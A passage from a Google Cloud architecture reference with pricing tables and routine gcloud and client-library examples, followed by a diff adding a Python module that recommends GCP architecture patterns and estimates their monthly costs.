- Storage: $0.30/GiB/month
```
**Use when:**
- Global applications needing strong consistency
- Relational data at massive scale
- 99.999% availability requirement
- Horizontal scaling with SQL
### BigQuery
**Best for:** Analytics, data warehouse, SQL on massive datasets
```
Limits:
- Query: 6-hour timeout
- Concurrent queries: 100 default
- Streaming inserts: 100K rows/sec per table
Pricing:
- On-demand: $6.25 per TB queried (first 1 TB free/month)
- Editions: Autoscale slots starting at $0.04/slot-hour
- Storage: $0.02/GiB (active), $0.01/GiB (long-term)
```
### Firestore vs Cloud SQL vs Spanner
| Factor | Firestore | Cloud SQL | Cloud Spanner |
|--------|-----------|-----------|---------------|
| Query flexibility | Document-based | Full SQL | Full SQL |
| Scaling | Automatic | Vertical + read replicas | Horizontal |
| Consistency | Strong (single region) | ACID | Strong (global) |
| Cost model | Per-operation | Per-hour | Per-node-hour |
| Operational | Zero management | Managed (some ops) | Managed |
| Best for | Mobile/web apps | Traditional apps | Global scale |
---
## Storage Services
### Cloud Storage Classes
| Class | Access Pattern | Min Duration | Cost (GiB/mo) |
|-------|---------------|--------------|----------------|
| Standard | Frequent | None | $0.020 |
| Nearline | Monthly access | 30 days | $0.010 |
| Coldline | Quarterly access | 90 days | $0.004 |
| Archive | Annual access | 365 days | $0.0012 |
### Lifecycle Policy Example
```json
{
"lifecycle": {
"rule": [
{
"action": { "type": "SetStorageClass", "storageClass": "NEARLINE" },
"condition": { "age": 30, "matchesStorageClass": ["STANDARD"] }
},
{
"action": { "type": "SetStorageClass", "storageClass": "COLDLINE" },
"condition": { "age": 90, "matchesStorageClass": ["NEARLINE"] }
},
{
"action": { "type": "SetStorageClass", "storageClass": "ARCHIVE" },
"condition": { "age": 365, "matchesStorageClass": ["COLDLINE"] }
},
{
"action": { "type": "Delete" },
"condition": { "age": 2555 }
}
]
}
}
```
### Autoclass
Automatically transitions objects between storage classes based on access patterns. Recommended for mixed or unknown access patterns.
```bash
gsutil mb -l us-central1 --autoclass gs://my-bucket/
```
### Block and File Storage
| Service | Use Case | Access |
|---------|----------|--------|
| Persistent Disk | GCE/GKE block storage | Single instance (RW) or multi (RO) |
| Filestore | NFS shared file system | Multiple instances |
| Parallelstore | HPC parallel file system | High throughput |
| Cloud Storage FUSE | Mount GCS as filesystem | Any compute |
---
## Messaging and Events
### Decision Matrix
| Pattern | Service | Use Case |
|---------|---------|----------|
| Pub/sub messaging | Pub/Sub | Event streaming, microservice decoupling |
| Task queue | Cloud Tasks | Asynchronous task execution with retries |
| Workflow orchestration | Workflows | Multi-step service orchestration |
| Batch orchestration | Cloud Composer | Complex DAG-based pipelines (Airflow) |
| Event triggers | Eventarc | Route events to Cloud Run, GKE, Workflows |
### Pub/Sub
**Best for:** Event-driven architectures, stream processing
```
Limits:
- Message size: 10 MB max
- Throughput: Unlimited (auto-scaling)
- Retention: 7 days default (up to 31 days)
- Ordering: Per ordering key
Pricing: $40/TiB for message delivery
```
```python
# Pub/Sub publisher example
from google.cloud import pubsub_v1
import json
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path('my-project', 'events')
def publish_event(event_type, payload):
data = json.dumps(payload).encode('utf-8')
future = publisher.publish(
topic_path,
data,
event_type=event_type
)
return future.result()
```
### Cloud Tasks
**Best for:** Asynchronous task execution with delivery guarantees
```
Features:
- Configurable retry policies
- Rate limiting
- Scheduled delivery
- HTTP and App Engine targets
Pricing: $0.40 per million operations
```
### Eventarc
**Best for:** Routing cloud events to services
```python
# Eventarc routes events from 130+ Google Cloud sources
# to Cloud Run, GKE, or Workflows
# Example: Trigger Cloud Run on Cloud Storage upload
# gcloud eventarc triggers create my-trigger \
# --destination-run-service=my-service \
# --event-filters="type=google.cloud.storage.object.v1.finalized" \
# --event-filters="bucket=my-bucket"
```
---
## API and Integration
### API Gateway vs Cloud Endpoints vs Cloud Run
| Factor | API Gateway | Cloud Endpoints | Cloud Run (direct) |
|--------|-------------|-----------------|---------------------|
| Protocol | REST, gRPC | REST, gRPC | Any HTTP |
| Auth | API keys, JWT, Firebase | API keys, JWT | IAM, custom |
| Rate limiting | Built-in | Built-in | Manual |
| Cost | Per-call pricing | Per-call pricing | Per-request |
| Best for | External APIs | Internal APIs | Simple services |
### Cloud Endpoints Configuration
```yaml
# openapi.yaml
swagger: "2.0"
info:
title: "My API"
version: "1.0.0"
host: "my-api-xyz.apigateway.my-project.cloud.goog"
schemes:
- "https"
paths:
/users:
get:
summary: "List users"
operationId: "listUsers"
x-google-backend:
address: "https://my-app-api-xyz.a.run.app"
security:
- api_key: []
securityDefinitions:
api_key:
type: "apiKey"
name: "key"
in: "query"
```
### Workflows
**Best for:** Orchestrating multi-service processes
```yaml
# workflow.yaml
main:
steps:
- processOrder:
call: http.post
args:
url: https://orders-service.run.app/process
body:
orderId: ${args.orderId}
result: orderResult
- checkInventory:
switch:
- condition: ${orderResult.body.inStock}
next: shipOrder
next: backOrder
- shipOrder:
call: http.post
args:
url: https://shipping-service.run.app/ship
body:
orderId: ${args.orderId}
result: shipResult
- backOrder:
call: http.post
args:
url: https://inventory-service.run.app/backorder
body:
orderId: ${args.orderId}
```
---
## Networking
### VPC Components
| Component | Purpose |
|-----------|---------|
| VPC | Isolated network (global resource) |
| Subnet | Regional network segment |
| Cloud NAT | Outbound internet for private instances |
| Cloud Router | Dynamic routing (BGP) |
| Private Google Access | Access GCP APIs without public IP |
| VPC Peering | Connect two VPC networks |
| Shared VPC | Share VPC across projects |
### VPC Design Pattern
```
VPC: 10.0.0.0/16 (global)
Subnet us-central1:
10.0.0.0/20 (primary)
10.4.0.0/14 (pods - secondary)
10.8.0.0/20 (services - secondary)
- GKE cluster, Cloud Run (VPC connector)
Subnet us-east1:
10.0.16.0/20 (primary)
- Cloud SQL (private IP), Memorystore
Subnet europe-west1:
10.0.32.0/20 (primary)
- DR / multi-region workloads
```
### Private Google Access
```bash
# Enable Private Google Access on a subnet
gcloud compute networks subnets update my-subnet \
--region=us-central1 \
--enable-private-google-access
```
---
## Security and Identity
### IAM Best Practices
```bash
# Prefer predefined roles over basic roles
# BAD: roles/editor (too broad)
# GOOD: roles/run.invoker (specific)
# Grant role to service account
gcloud projects add-iam-policy-binding my-project \
--member="serviceAccount:my-sa@my-project.iam.gserviceaccount.com" \
--role="roles/datastore.user" \
--condition='expression=resource.name.startsWith("projects/my-project/databases/(default)/documents/users"),title=firestore-users-only'
```
### Service Account Best Practices
| Practice | Description |
|----------|-------------|
| One SA per service | Separate service accounts per workload |
| Workload Identity | Bind K8s SAs to GCP SAs in GKE |
| Short-lived tokens | Use impersonation instead of key files |
| No SA keys | Avoid downloading JSON key files |
### Secret Manager vs Environment Variables
| Factor | Secret Manager | Env Variables |
|--------|---------------|---------------|
| Rotation | Automatic versioning | Manual redeploy |
| Audit | Cloud Audit Logs | No audit trail |
| Access control | IAM per-secret | Per-service |
| Pricing | $0.06/10K access ops | Free |
| Use case | Credentials, API keys | Non-sensitive config |
### Secret Manager Usage
```python
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
client = secretmanager.SecretManagerServiceClient()
name = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
response = client.access_secret_version(request={"name": name})
return response.payload.data.decode("UTF-8")
# Usage
db_password = get_secret("my-project", "db-password")
```

View File

@@ -0,0 +1,805 @@
"""
GCP architecture design and service recommendation module.
Generates architecture patterns based on application requirements.
"""
import argparse
import json
import sys
from typing import Dict, List, Any
from enum import Enum
class ApplicationType(Enum):
    """Types of applications supported.

    The string values mirror the 'application_type' keys matched in
    ArchitectureDesigner.recommend_architecture_pattern.
    """

    WEB_APP = "web_application"        # browser-facing web apps / websites
    MOBILE_BACKEND = "mobile_backend"  # API backend for mobile clients
    DATA_PIPELINE = "data_pipeline"    # batch/stream data processing
    MICROSERVICES = "microservices"    # service-oriented deployments
    SAAS_PLATFORM = "saas_platform"    # multi-tenant SaaS products
    ML_PLATFORM = "ml_platform"        # ML training/serving platforms
class ArchitectureDesigner:
"""Design GCP architectures based on requirements."""
def __init__(self, requirements: Dict[str, Any]):
"""
Initialize with application requirements.
Args:
requirements: Dictionary containing app type, traffic, budget, etc.
"""
self.app_type = requirements.get('application_type', 'web_application')
self.expected_users = requirements.get('expected_users', 1000)
self.requests_per_second = requirements.get('requests_per_second', 10)
self.budget_monthly = requirements.get('budget_monthly_usd', 500)
self.team_size = requirements.get('team_size', 3)
self.gcp_experience = requirements.get('gcp_experience', 'beginner')
self.compliance_needs = requirements.get('compliance', [])
self.data_size_gb = requirements.get('data_size_gb', 10)
def recommend_architecture_pattern(self) -> Dict[str, Any]:
    """Recommend an architecture pattern based on requirements.

    Web apps and SaaS platforms are sized by expected user count; other
    application types map one-to-one onto a pattern. Unrecognized types
    fall back to the serverless web pattern.

    Returns:
        Dictionary with the recommended pattern and its services.
    """
    # User-count tiers apply only to web-style workloads.
    if self.app_type in ('web_application', 'saas_platform'):
        if self.expected_users < 10000:
            return self._serverless_web_architecture()
        if self.expected_users < 100000:
            return self._gke_microservices_architecture()
        return self._multi_region_architecture()

    pattern_for = {
        'mobile_backend': self._serverless_mobile_backend,
        'data_pipeline': self._data_pipeline_architecture,
        'microservices': self._gke_microservices_architecture,
        'ml_platform': self._ml_platform_architecture,
    }
    # Default mirrors the original else-branch: serverless web pattern.
    return pattern_for.get(self.app_type, self._serverless_web_architecture)()
def _serverless_web_architecture(self) -> Dict[str, Any]:
    """Serverless web application pattern using Cloud Run.

    Returns a static description of the pattern: the GCP services involved
    (with suggested configuration), an indicative cost breakdown, pros/cons,
    and the scaling envelope. Only the cost total is computed, via
    self._calculate_serverless_cost(); everything else is fixed content.

    Returns:
        Dict describing the 'Serverless Web Application' pattern.
    """
    return {
        'pattern_name': 'Serverless Web Application',
        'description': 'Fully serverless architecture with Cloud Run and Firestore',
        'use_case': 'SaaS platforms, low to medium traffic websites, MVPs',
        'services': {
            # Static assets served from a bucket behind Cloud CDN.
            'frontend': {
                'service': 'Cloud Storage + Cloud CDN',
                'purpose': 'Static website hosting with global CDN',
                'configuration': {
                    'bucket': 'Website bucket with public access',
                    'cdn': 'Cloud CDN with custom domain and HTTPS',
                    'caching': 'Cache-Control headers, edge caching'
                }
            },
            # Containerized API; min_instances=0 keeps idle cost near zero.
            'api': {
                'service': 'Cloud Run',
                'purpose': 'Containerized API backend with auto-scaling',
                'configuration': {
                    'cpu': '1 vCPU',
                    'memory': '512 Mi',
                    'min_instances': '0 (scale to zero)',
                    'max_instances': '10',
                    'concurrency': '80 requests per instance',
                    'timeout': '300 seconds'
                }
            },
            'database': {
                'service': 'Firestore',
                'purpose': 'NoSQL document database with real-time sync',
                'configuration': {
                    'mode': 'Native mode',
                    'location': 'Regional or multi-region',
                    'security_rules': 'Firestore security rules',
                    'backup': 'Scheduled exports to Cloud Storage'
                }
            },
            'authentication': {
                'service': 'Identity Platform',
                'purpose': 'User authentication and authorization',
                'configuration': {
                    'providers': 'Email/password, Google, Apple, OIDC',
                    'mfa': 'SMS or TOTP multi-factor authentication',
                    'token_expiration': '1 hour access, 30 days refresh'
                }
            },
            'cicd': {
                'service': 'Cloud Build',
                'purpose': 'Automated build and deployment from Git',
                'configuration': {
                    'source': 'GitHub or Cloud Source Repositories',
                    'build': 'Automatic on commit',
                    'environments': 'dev, staging, production'
                }
            }
        },
        'estimated_cost': {
            # Total derives from the instance's requirements; the breakdown
            # below is indicative per-service guidance, not a computed sum.
            'monthly_usd': self._calculate_serverless_cost(),
            'breakdown': {
                'Cloud CDN': '5-20 USD',
                'Cloud Run': '5-25 USD',
                'Firestore': '5-30 USD',
                'Identity Platform': '0-10 USD (free tier: 50k MAU)',
                'Cloud Storage': '1-5 USD'
            }
        },
        'pros': [
            'No server management',
            'Auto-scaling with scale-to-zero',
            'Pay only for what you use',
            'No cold starts with min instances',
            'Container-based (no runtime restrictions)'
        ],
        'cons': [
            'Vendor lock-in to GCP',
            'Regional availability considerations',
            'Debugging distributed systems complex',
            'Firestore query limitations vs SQL'
        ],
        'scaling_characteristics': {
            'users_supported': '1k - 100k',
            'requests_per_second': '100 - 10,000',
            'scaling_method': 'Automatic (Cloud Run auto-scaling)'
        }
    }
def _gke_microservices_architecture(self) -> Dict[str, Any]:
    """GKE-based microservices architecture.

    Returns a static description of a Kubernetes-native pattern built on
    GKE Autopilot plus managed data services. Only the cost total is
    computed, via self._calculate_gke_cost(); everything else is fixed
    reference content.

    Returns:
        Dict describing the 'Microservices on GKE' pattern.
    """
    return {
        'pattern_name': 'Microservices on GKE',
        'description': 'Kubernetes-native architecture with managed services',
        'use_case': 'SaaS platforms, complex microservices, enterprise applications',
        'services': {
            'load_balancer': {
                'service': 'Cloud Load Balancing',
                'purpose': 'Global HTTP(S) load balancing',
                'configuration': {
                    'type': 'External Application Load Balancer',
                    'ssl': 'Google-managed SSL certificate',
                    'health_checks': '/health endpoint, 10s interval',
                    'cdn': 'Cloud CDN enabled for static content'
                }
            },
            # Autopilot removes node management; billing is per-pod resources.
            'compute': {
                'service': 'GKE Autopilot',
                'purpose': 'Managed Kubernetes for containerized workloads',
                'configuration': {
                    'mode': 'Autopilot (fully managed node provisioning)',
                    'scaling': 'Horizontal Pod Autoscaler',
                    'networking': 'VPC-native with Alias IPs',
                    'workload_identity': 'Enabled for secure service account binding'
                }
            },
            'database': {
                'service': 'Cloud SQL (PostgreSQL)',
                'purpose': 'Managed relational database',
                'configuration': {
                    'tier': 'db-custom-2-8192 (2 vCPU, 8 GB RAM)',
                    'high_availability': 'Regional with automatic failover',
                    'read_replicas': '1-2 for read scaling',
                    'backup': 'Automated daily backups, 7-day retention',
                    'encryption': 'Customer-managed encryption key (CMEK)'
                }
            },
            'cache': {
                'service': 'Memorystore (Redis)',
                'purpose': 'Session storage, application caching',
                'configuration': {
                    'tier': 'Basic (1 GB) or Standard (HA)',
                    'version': 'Redis 7.0',
                    'eviction_policy': 'allkeys-lru'
                }
            },
            'messaging': {
                'service': 'Pub/Sub',
                'purpose': 'Asynchronous messaging between services',
                'configuration': {
                    'topics': 'Per-domain event topics',
                    'subscriptions': 'Pull or push delivery',
                    'dead_letter': 'Dead letter topic after 5 retries',
                    'ordering': 'Ordering keys for ordered delivery'
                }
            },
            'storage': {
                'service': 'Cloud Storage',
                'purpose': 'User uploads, backups, logs',
                'configuration': {
                    'storage_class': 'Standard with lifecycle policies',
                    'versioning': 'Enabled for important buckets',
                    'lifecycle': 'Transition to Nearline after 30 days'
                }
            }
        },
        'estimated_cost': {
            # Total derives from the instance's requirements; the breakdown
            # below is indicative per-service guidance, not a computed sum.
            'monthly_usd': self._calculate_gke_cost(),
            'breakdown': {
                'Cloud Load Balancing': '20-40 USD',
                'GKE Autopilot': '75-250 USD',
                'Cloud SQL': '80-250 USD',
                'Memorystore': '30-80 USD',
                'Pub/Sub': '5-20 USD',
                'Cloud Storage': '5-20 USD'
            }
        },
        'pros': [
            'Kubernetes ecosystem compatibility',
            'Fine-grained scaling control',
            'Multi-cloud portability',
            'Rich service mesh (Anthos Service Mesh)',
            'Managed node provisioning with Autopilot'
        ],
        'cons': [
            'Higher baseline costs than serverless',
            'Kubernetes learning curve',
            'More operational complexity',
            'GKE management fee ($74.40/month per cluster)'
        ],
        'scaling_characteristics': {
            'users_supported': '10k - 500k',
            'requests_per_second': '1,000 - 50,000',
            'scaling_method': 'HPA + Cluster Autoscaler'
        }
    }
def _serverless_mobile_backend(self) -> Dict[str, Any]:
    """Serverless mobile backend with Firebase.

    Returns:
        Pattern-description dict: Firebase-centric service choices
        (Cloud Functions, Firestore, Cloud Storage, Firebase Auth, FCM,
        Analytics), a rough monthly cost estimate, pros/cons, and
        scaling characteristics.
    """
    return {
        'pattern_name': 'Serverless Mobile Backend',
        'description': 'Mobile-first backend with Firebase and Cloud Functions',
        'use_case': 'Mobile apps, real-time applications, offline-first apps',
        'services': {
            'api': {
                'service': 'Cloud Functions (2nd gen)',
                'purpose': 'Event-driven API handlers',
                'configuration': {
                    'runtime': 'Node.js 20 or Python 3.12',
                    'memory': '256 MB - 1 GB',
                    'timeout': '60 seconds',
                    'concurrency': 'Up to 1000 concurrent'
                }
            },
            'database': {
                'service': 'Firestore',
                'purpose': 'Real-time NoSQL database with offline sync',
                'configuration': {
                    'mode': 'Native mode',
                    'multi_region': 'nam5 or eur3 for HA',
                    'security_rules': 'Client-side access control',
                    'indexes': 'Composite indexes for queries'
                }
            },
            'file_storage': {
                'service': 'Cloud Storage (Firebase)',
                'purpose': 'User uploads (images, videos, documents)',
                'configuration': {
                    'access': 'Firebase Security Rules',
                    'resumable_uploads': 'Enabled for large files',
                    'cdn': 'Automatic via Firebase Hosting CDN'
                }
            },
            'authentication': {
                'service': 'Firebase Authentication',
                'purpose': 'User management and federation',
                'configuration': {
                    'providers': 'Email, Google, Apple, Phone',
                    'anonymous_auth': 'Enabled for guest access',
                    'custom_claims': 'Role-based access control',
                    'multi_tenancy': 'Supported via Identity Platform'
                }
            },
            'push_notifications': {
                'service': 'Firebase Cloud Messaging (FCM)',
                'purpose': 'Push notifications to mobile devices',
                'configuration': {
                    'platforms': 'iOS (APNs), Android, Web',
                    'topics': 'Topic-based group messaging',
                    'analytics': 'Notification delivery tracking'
                }
            },
            'analytics': {
                'service': 'Google Analytics (Firebase)',
                'purpose': 'User analytics and event tracking',
                'configuration': {
                    'events': 'Custom and automatic events',
                    'audiences': 'User segmentation',
                    'bigquery_export': 'Raw event export to BigQuery'
                }
            }
        },
        'estimated_cost': {
            # Heuristic: ~$40 baseline plus $0.004 per expected user.
            # NOTE(review): unlike patterns that use _calculate_*_cost(), this
            # estimate is not capped at self.budget_monthly — confirm intent.
            'monthly_usd': 40 + (self.expected_users * 0.004),
            'breakdown': {
                'Cloud Functions': '5-30 USD',
                'Firestore': '10-50 USD',
                'Cloud Storage': '5-20 USD',
                'Identity Platform': '0-15 USD',
                'FCM': '0 USD (free)',
                'Analytics': '0 USD (free)'
            }
        },
        'pros': [
            'Real-time data sync built-in',
            'Offline-first support',
            'Firebase SDKs for iOS/Android/Web',
            'Free tier covers most MVPs',
            'Rapid development with Firebase console'
        ],
        'cons': [
            'Firestore query limitations',
            'Vendor lock-in to Firebase/GCP',
            'Cost scaling can be unpredictable',
            'Limited server-side control'
        ],
        'scaling_characteristics': {
            'users_supported': '1k - 1M',
            'requests_per_second': '100 - 100,000',
            'scaling_method': 'Automatic (Firebase managed)'
        }
    }
def _data_pipeline_architecture(self) -> Dict[str, Any]:
    """Serverless data pipeline with BigQuery.

    Returns:
        Pattern-description dict for a Pub/Sub -> Dataflow -> BigQuery
        stack with a Cloud Storage data lake, Looker dashboards, and
        optional Cloud Composer orchestration.
    """
    return {
        'pattern_name': 'Serverless Data Pipeline',
        'description': 'Scalable data ingestion, processing, and analytics',
        'use_case': 'Analytics, IoT data, log processing, ETL, data warehousing',
        'services': {
            'ingestion': {
                'service': 'Pub/Sub',
                'purpose': 'Real-time event and data ingestion',
                'configuration': {
                    'throughput': 'Unlimited (auto-scaling)',
                    'retention': '7 days (configurable to 31 days)',
                    'ordering': 'Ordering keys for ordered delivery',
                    'dead_letter': 'Dead letter topic for failed messages'
                }
            },
            'processing': {
                'service': 'Dataflow (Apache Beam)',
                'purpose': 'Stream and batch data processing',
                'configuration': {
                    'mode': 'Streaming or batch',
                    'autoscaling': 'Horizontal autoscaling',
                    # Initial worker count scales with data volume:
                    # roughly one worker per 20 GB, minimum 1.
                    'workers': f'{max(1, self.data_size_gb // 20)} initial workers',
                    'sdk': 'Python or Java Apache Beam SDK'
                }
            },
            'warehouse': {
                'service': 'BigQuery',
                'purpose': 'Serverless data warehouse and analytics',
                'configuration': {
                    'pricing': 'On-demand ($6.25/TB queried) or slots',
                    'partitioning': 'By ingestion time or custom field',
                    'clustering': 'Up to 4 clustering columns',
                    'streaming_insert': 'Real-time data availability'
                }
            },
            'storage': {
                'service': 'Cloud Storage (Data Lake)',
                'purpose': 'Raw data lake and archival storage',
                'configuration': {
                    'format': 'Parquet or Avro (columnar)',
                    'partitioning': 'By date (year/month/day)',
                    'lifecycle': 'Transition to Coldline after 90 days',
                    'catalog': 'Dataplex for data governance'
                }
            },
            'visualization': {
                'service': 'Looker / Looker Studio',
                'purpose': 'Business intelligence dashboards',
                'configuration': {
                    'source': 'BigQuery direct connection',
                    'refresh': 'Real-time or scheduled',
                    'sharing': 'Embedded or web dashboards'
                }
            },
            'orchestration': {
                'service': 'Cloud Composer (Airflow)',
                'purpose': 'Workflow orchestration for batch pipelines',
                'configuration': {
                    'environment': 'Cloud Composer 2 (auto-scaling)',
                    'dags': 'Python DAG definitions',
                    'scheduling': 'Cron-based scheduling'
                }
            }
        },
        'estimated_cost': {
            # Budget-capped heuristic; see _calculate_data_pipeline_cost().
            'monthly_usd': self._calculate_data_pipeline_cost(),
            'breakdown': {
                'Pub/Sub': '5-30 USD',
                'Dataflow': '20-150 USD',
                'BigQuery': '10-100 USD (on-demand)',
                'Cloud Storage': '5-30 USD',
                'Looker Studio': '0 USD (free)',
                'Cloud Composer': '300+ USD (if used)'
            }
        },
        'pros': [
            'Fully serverless data stack',
            'BigQuery scales to petabytes',
            'Real-time and batch in same pipeline',
            'Cost-effective with on-demand pricing',
            'ML integration via BigQuery ML'
        ],
        'cons': [
            'Dataflow has steep learning curve (Beam SDK)',
            'BigQuery costs based on data scanned',
            'Cloud Composer expensive for small workloads',
            'Schema evolution requires planning'
        ],
        'scaling_characteristics': {
            'events_per_second': '1,000 - 10,000,000',
            'data_volume': '1 GB - 1 PB per day',
            'scaling_method': 'Automatic (all services auto-scale)'
        }
    }
def _ml_platform_architecture(self) -> Dict[str, Any]:
    """ML platform architecture with Vertex AI.

    Returns:
        Pattern-description dict for an end-to-end ML stack: Vertex AI
        for training/serving, BigQuery for feature engineering, Cloud
        Storage for artifacts, Cloud Functions for triggers, and Vertex
        AI Model Monitoring for drift detection.
    """
    return {
        'pattern_name': 'ML Platform',
        'description': 'End-to-end machine learning platform',
        'use_case': 'Model training, serving, MLOps, feature engineering',
        'services': {
            'ml_platform': {
                'service': 'Vertex AI',
                'purpose': 'Training, tuning, and serving ML models',
                'configuration': {
                    'training': 'Custom or AutoML training jobs',
                    'prediction': 'Online or batch prediction endpoints',
                    'pipelines': 'Vertex AI Pipelines for MLOps',
                    'feature_store': 'Vertex AI Feature Store'
                }
            },
            'data': {
                'service': 'BigQuery',
                'purpose': 'Feature engineering and data exploration',
                'configuration': {
                    'ml': 'BigQuery ML for in-warehouse models',
                    'export': 'Export to Cloud Storage for training',
                    'feature_engineering': 'SQL-based transformations'
                }
            },
            'storage': {
                'service': 'Cloud Storage',
                'purpose': 'Datasets, model artifacts, experiment logs',
                'configuration': {
                    'buckets': 'Separate buckets for data/models/logs',
                    'versioning': 'Enabled for model artifacts',
                    'lifecycle': 'Archive old experiment data'
                }
            },
            'triggers': {
                'service': 'Cloud Functions',
                'purpose': 'Event-driven preprocessing and triggers',
                'configuration': {
                    'triggers': 'Cloud Storage, Pub/Sub, Scheduler',
                    'preprocessing': 'Data validation and transforms',
                    'notifications': 'Training completion alerts'
                }
            },
            'monitoring': {
                'service': 'Vertex AI Model Monitoring',
                'purpose': 'Detect data drift and model degradation',
                'configuration': {
                    'skew_detection': 'Training-serving skew alerts',
                    'drift_detection': 'Feature drift monitoring',
                    'alerting': 'Cloud Monitoring integration'
                }
            }
        },
        'estimated_cost': {
            # Heuristic: ~$200 baseline plus $2 per GB of data.
            # NOTE(review): unlike patterns that use _calculate_*_cost(), this
            # estimate is not capped at self.budget_monthly — confirm intent.
            'monthly_usd': 200 + (self.data_size_gb * 2),
            'breakdown': {
                'Vertex AI Training': '50-500 USD (GPU dependent)',
                'Vertex AI Prediction': '30-200 USD',
                'BigQuery': '20-100 USD',
                'Cloud Storage': '10-50 USD',
                'Cloud Functions': '5-20 USD'
            }
        },
        'pros': [
            'End-to-end ML lifecycle management',
            'AutoML for rapid prototyping',
            'Integrated with BigQuery and Cloud Storage',
            'Managed model serving with autoscaling',
            'Built-in experiment tracking'
        ],
        'cons': [
            'GPU costs can escalate quickly',
            'Vertex AI pricing is complex',
            'Limited customization vs self-managed',
            'Vendor lock-in for model artifacts'
        ],
        'scaling_characteristics': {
            'training': 'Multi-GPU, distributed training',
            'prediction': '1 - 1000+ replicas',
            'scaling_method': 'Automatic endpoint scaling'
        }
    }
def _multi_region_architecture(self) -> Dict[str, Any]:
    """Multi-region high availability architecture.

    Returns:
        Pattern-description dict for an active-active, globally
        distributed deployment: health-checked Cloud DNS, Cloud CDN,
        multi-region compute (GKE or Cloud Run), Spanner/Firestore
        multi-region databases, and geo-redundant Cloud Storage.
    """
    return {
        'pattern_name': 'Multi-Region High Availability',
        'description': 'Global deployment with disaster recovery',
        'use_case': 'Global applications, 99.99% uptime, compliance',
        'services': {
            'dns': {
                'service': 'Cloud DNS',
                'purpose': 'Global DNS with health-checked routing',
                'configuration': {
                    'routing_policy': 'Geolocation or weighted routing',
                    'health_checks': 'HTTP health checks per region',
                    'failover': 'Automatic DNS failover'
                }
            },
            'cdn': {
                'service': 'Cloud CDN',
                'purpose': 'Edge caching and acceleration',
                'configuration': {
                    'origins': 'Multiple regional backends',
                    'cache_modes': 'CACHE_ALL_STATIC or USE_ORIGIN_HEADERS',
                    'edge_locations': 'Global (100+ locations)'
                }
            },
            'compute': {
                'service': 'Multi-region GKE or Cloud Run',
                'purpose': 'Active-active deployment across regions',
                'configuration': {
                    'regions': 'us-central1 (primary), europe-west1 (secondary)',
                    'deployment': 'Cloud Deploy for multi-region rollout',
                    'traffic_split': 'Global Load Balancer with traffic management'
                }
            },
            'database': {
                'service': 'Cloud Spanner or Firestore multi-region',
                'purpose': 'Globally consistent database',
                'configuration': {
                    'spanner': 'Multi-region config (nam-eur-asia1)',
                    'firestore': 'Multi-region location (nam5, eur3)',
                    'consistency': 'Strong consistency (Spanner) or eventual (Firestore)',
                    'replication': 'Automatic cross-region replication'
                }
            },
            'storage': {
                'service': 'Cloud Storage (dual-region or multi-region)',
                'purpose': 'Geo-redundant object storage',
                'configuration': {
                    'location': 'Dual-region (us-central1+us-east1) or multi-region (US)',
                    'turbo_replication': '15-minute RPO with turbo replication',
                    'versioning': 'Enabled for critical data'
                }
            }
        },
        'estimated_cost': {
            # Approximated as 2x the single-region GKE estimate.
            # NOTE(review): _calculate_gke_cost() caps at budget_monthly
            # BEFORE the doubling, so this figure can exceed the budget —
            # confirm that is the intended behavior.
            'monthly_usd': self._calculate_gke_cost() * 2.0,
            'breakdown': {
                'Cloud DNS': '5-15 USD',
                'Cloud CDN': '20-100 USD',
                'Compute (2 regions)': '150-500 USD',
                'Cloud Spanner': '500-2000 USD (multi-region)',
                'Data transfer (cross-region)': '50-200 USD'
            }
        },
        'pros': [
            'Global low latency',
            'High availability (99.99%+)',
            'Disaster recovery built-in',
            'Data sovereignty compliance',
            'Automatic failover'
        ],
        'cons': [
            '2x+ costs vs single region',
            'Cloud Spanner is expensive',
            'Complex deployment pipeline',
            'Cross-region data transfer costs',
            'Operational overhead'
        ],
        'scaling_characteristics': {
            'users_supported': '100k - 100M',
            'requests_per_second': '10,000 - 10,000,000',
            'scaling_method': 'Per-region auto-scaling + global load balancing'
        }
    }
def _calculate_serverless_cost(self) -> float:
    """Rough monthly USD estimate for the serverless web pattern.

    Sums per-service heuristics (each with a small floor) and caps the
    result at the configured monthly budget.
    """
    monthly_requests = self.requests_per_second * 2_592_000  # ~30 days of seconds
    components = [
        max(5, (monthly_requests / 1_000_000) * 0.40),  # Cloud Run ($0.40/M requests)
        max(5, self.data_size_gb * 0.18),               # Firestore storage
        max(5, self.expected_users * 0.008),            # Cloud CDN egress
        max(1, self.data_size_gb * 0.02),               # Cloud Storage
    ]
    return min(sum(components), self.budget_monthly)
def _calculate_gke_cost(self) -> float:
    """Rough monthly USD estimate for the GKE microservices pattern.

    Adds the Autopilot cluster fee, a user-count-driven pod cost, and
    fixed Cloud SQL / Memorystore / load-balancer baselines, capped at
    the configured monthly budget.
    """
    workload_units = max(2, self.expected_users // 5000)  # one 35-USD unit per ~5k users
    estimate = (
        74.40                   # GKE Autopilot cluster management fee
        + workload_units * 35   # pod resources
        + 120                   # Cloud SQL db-custom-2-8192 baseline
        + 35                    # Memorystore Basic 1 GB
        + 25                    # load balancer
    )
    return min(estimate, self.budget_monthly)
def _calculate_data_pipeline_cost(self) -> float:
    """Rough monthly USD estimate for the data pipeline pattern.

    Sums per-service heuristics driven by data volume and caps the
    result at the configured monthly budget.
    """
    gb = self.data_size_gb
    components = [
        max(5, gb * 0.5),           # Pub/Sub ingestion
        max(20, gb * 1.5),          # Dataflow workers
        max(10, gb * 0.02 * 6.25),  # BigQuery on-demand scans
        gb * 0.02,                  # Cloud Storage data lake
    ]
    return min(sum(components), self.budget_monthly)
def generate_service_checklist(self) -> list:
    """Build a phased implementation checklist for the recommended architecture.

    Returns:
        List of {'phase': str, 'tasks': [str, ...]} dicts ordered from
        planning through CI/CD. The "Core Services" tasks are derived
        from the services of the pattern chosen by
        recommend_architecture_pattern().
    """
    pattern = self.recommend_architecture_pattern()
    # One deployment task per service in the recommended pattern.
    deploy_tasks = [f"Deploy {svc['service']}" for svc in pattern['services'].values()]
    phases = [
        ('Planning', [
            'Review architecture pattern and services',
            'Estimate costs using GCP Pricing Calculator',
            'Define environment strategy (dev, staging, prod)',
            'Set up GCP Organization and projects',
            'Define labeling strategy for resources',
        ]),
        ('Foundation', [
            'Create VPC with subnets (if using GKE/Compute)',
            'Configure Cloud NAT for private resources',
            'Set up IAM roles and service accounts',
            'Enable Cloud Audit Logs',
            'Configure Organization policies',
        ]),
        ('Core Services', deploy_tasks),
        ('Security', [
            'Configure firewall rules and VPC Service Controls',
            'Enable encryption (Cloud KMS) for all services',
